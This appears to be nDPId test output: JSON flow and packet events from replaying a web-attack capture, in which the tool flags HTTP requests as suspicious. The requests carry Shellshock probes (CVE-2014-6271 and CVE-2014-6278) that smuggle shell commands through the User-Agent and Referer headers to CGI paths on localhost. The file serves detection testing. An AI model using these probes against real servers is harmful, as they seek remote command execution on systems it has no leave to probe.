+01168{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":457,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":457,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277409,"flow_last_seen":1576420277409,"flow_idle_time":7560000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277409,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50476,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/formmail.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":458,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":458,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277410,"flow_last_seen":1576420277410,"flow_idle_time":7560000,"flow_min_l4_payload_len":223,"flow_max_l4_payload_len":223,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":223,"midstream":1,"thread_ts_msec":1576420277410,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50478,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00779{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":458,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":458,"flow_packet_id":1,"flow_last_seen":1576420277410,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":289,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":289,"pkt_l4_len":255,"thread_ts_msec":1576420277410,"pkt":"AAAAAAAAAAAAAAAACABFAAEToPJAAEAGmvB\/AAABfwAAAcUuH5CLPJg5VfIqUIAYAED\/BwAAAQEICp1m\/cqdZv3KR0VUIC9Gb3JtTWFpbC1jbG9uZS5jZ2kgSFRUUC8xLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01174{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":458,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":458,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277410,"flow_last_seen":1576420277410,"flow_idle_time":7560000,"flow_min_l4_payload_len":223,"flow_max_l4_payload_len":223,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":223,"midstream":1,"thread_ts_msec":1576420277410,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50478,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/FormMail-clone.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":459,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":459,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277412,"flow_last_seen":1576420277412,"flow_idle_time":7560000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1576420277412,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50480,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00771{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":459,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":459,"flow_packet_id":1,"flow_last_seen":1576420277412,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":284,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":284,"pkt_l4_len":250,"thread_ts_msec":1576420277412,"pkt":"AAAAAAAAAAAAAAAACABFAAEOAyBAAEAGOMh\/AAABfwAAAcUwH5BOyzvYEAppQYAYAED\/AgAAAQEICp1m\/cydZv3MR0VUIC9ndWVzdGJvb2suY2dpIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01169{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":459,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":459,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277412,"flow_last_seen":1576420277412,"flow_idle_time":7560000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1576420277412,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50480,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard 
Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/guestbook.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":460,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":460,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277414,"flow_last_seen":1576420277414,"flow_idle_time":7560000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277414,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50482,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00771{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":460,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":460,"flow_packet_id":1,"flow_last_seen":1576420277414,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":283,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":283,"pkt_l4_len":249,"thread_ts_msec":1576420277414,"pkt":"AAAAAAAAAAAAAAAACABFAAENCPdAAEAGMvJ\/AAABfwAAAcUyH5A4wTA94El3uoAYAED\/AQAAAQEICp1m\/c6dZv3OR0VUIC9oZWxwZGVzay5jZ2kgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} 
+01168{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":460,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":460,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277414,"flow_last_seen":1576420277414,"flow_idle_time":7560000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277414,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50482,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/helpdesk.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":461,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":461,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277416,"flow_last_seen":1576420277416,"flow_idle_time":7560000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277416,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50484,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":461,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":461,"flow_packet_id":1,"flow_last_seen":1576420277416,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":280,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":280,"pkt_l4_len":246,"thread_ts_msec":1576420277416,"pkt":"AAAAAAAAAAAAAAAACABFAAEKgptAAEAGuVB\/AAABfwAAAcU0H5CIJLpUcW+qJoAYAED+\/gAAAQEICp1m\/dCdZv3QR0VUIC9pbmRleC5jZ2kgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01165{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":461,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":461,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277416,"flow_last_seen":1576420277416,"flow_idle_time":7560000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277416,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50484,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":462,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":462,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277417,"flow_last_seen":1576420277417,"flow_idle_time":7560000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277417,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50486,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":462,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":462,"flow_packet_id":1,"flow_last_seen":1576420277417,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":280,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":280,"pkt_l4_len":246,"thread_ts_msec":1576420277417,"pkt":"AAAAAAAAAAAAAAAACABFAAEKMxlAAEAGCNN\/AAABfwAAAcU2H5CRJgvewUykPIAYAED+\/gAAAQEICp1m\/dGdZv3RR0VUIC9pbmRleC5waHAgSFRUUC8xLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01165{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":462,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":462,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277417,"flow_last_seen":1576420277417,"flow_idle_time":7560000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277417,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50486,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard 
Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":463,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":463,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277419,"flow_last_seen":1576420277419,"flow_idle_time":7560000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277419,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50488,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":463,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":463,"flow_packet_id":1,"flow_last_seen":1576420277419,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":279,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":279,"pkt_l4_len":245,"thread_ts_msec":1576420277419,"pkt":"AAAAAAAAAAAAAAAACABFAAEJrmtAAEAGjYF\/AAABfwAAAcU4H5CXuZakZnwUBoAYAED+\/QAAAQEICp1m\/dOdZv3TR0VUIC9pbmRleC5wbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCg0K"} 
+01164{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":463,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":463,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277419,"flow_last_seen":1576420277419,"flow_idle_time":7560000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277419,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50488,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.pl","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":464,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":464,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277420,"flow_last_seen":1576420277420,"flow_idle_time":7560000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277420,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50490,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00764{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":464,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":464,"flow_packet_id":1,"flow_last_seen":1576420277420,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":279,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":279,"pkt_l4_len":245,"thread_ts_msec":1576420277420,"pkt":"AAAAAAAAAAAAAAAACABFAAEJZRVAAEAG1td\/AAABfwAAAcU6H5C6AV3ZPf\/xToAYAED+\/QAAAQEICp1m\/dSdZv3UR0VUIC9pbmZvLmNnaSBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01164{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":464,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":464,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277420,"flow_last_seen":1576420277420,"flow_idle_time":7560000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277420,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50490,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/info.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":465,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":465,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277422,"flow_last_seen":1576420277422,"flow_idle_time":7560000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277422,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50492,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":465,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":465,"flow_packet_id":1,"flow_last_seen":1576420277422,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"thread_ts_msec":1576420277422,"pkt":"AAAAAAAAAAAAAAAACABFAAEI0gtAAEAGaeJ\/AAABfwAAAcU8H5DcN+rDzEDc2oAYAED+\/AAAAQEICp1m\/dadZv3WR0VUIC9pbmZvLnNoIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KDQo="} +01163{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":465,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":465,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277422,"flow_last_seen":1576420277422,"flow_idle_time":7560000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277422,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50492,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard 
Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/info.sh","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":466,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":466,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277423,"flow_last_seen":1576420277423,"flow_idle_time":7560000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277423,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50494,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00771{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":466,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":466,"flow_packet_id":1,"flow_last_seen":1576420277423,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":283,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":283,"pkt_l4_len":249,"thread_ts_msec":1576420277423,"pkt":"AAAAAAAAAAAAAAAACABFAAENVqhAAEAG5UB\/AAABfwAAAcU+H5CeOW5utt+cAoAYAED\/AQAAAQEICp1m\/dedZv3XR0VUIC9sb2FkcGFnZS5jZ2kgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} 
+01168{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":466,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":466,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277423,"flow_last_seen":1576420277423,"flow_idle_time":7560000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277423,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50494,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/loadpage.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":467,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":467,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277425,"flow_last_seen":1576420277425,"flow_idle_time":7560000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277425,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50496,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
